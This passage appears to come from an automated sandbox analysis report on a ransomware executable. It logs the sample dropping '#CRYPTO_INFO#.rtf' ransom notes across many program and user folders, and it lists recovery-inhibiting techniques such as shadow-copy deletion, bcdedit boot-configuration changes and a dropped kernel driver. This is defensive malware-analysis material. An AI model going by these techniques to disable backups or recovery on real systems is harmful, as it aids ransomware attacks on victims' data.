8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1E092169-02CC-4B99-88F6-EB312344559C\x-none.16\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Public\Downloads\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\Credentials\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\tfwykxwe.Admin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\kk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Live\Bici\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{e899c9ec-23d1-46e4-a30b-a8e1b61d9dd4}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\w0w630d3.default-release\safebrowsing\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\th\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\cy-GB\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\w0w630d3.default-release\storage\permanent\chrome\idb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hy\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Public\Music\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Windows.ContactSupport_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ne-NP\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4136 bcdedit.exe 4852 bcdedit.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS dgFQYQPu64.exe -
Executes dropped EXE 136 IoCs
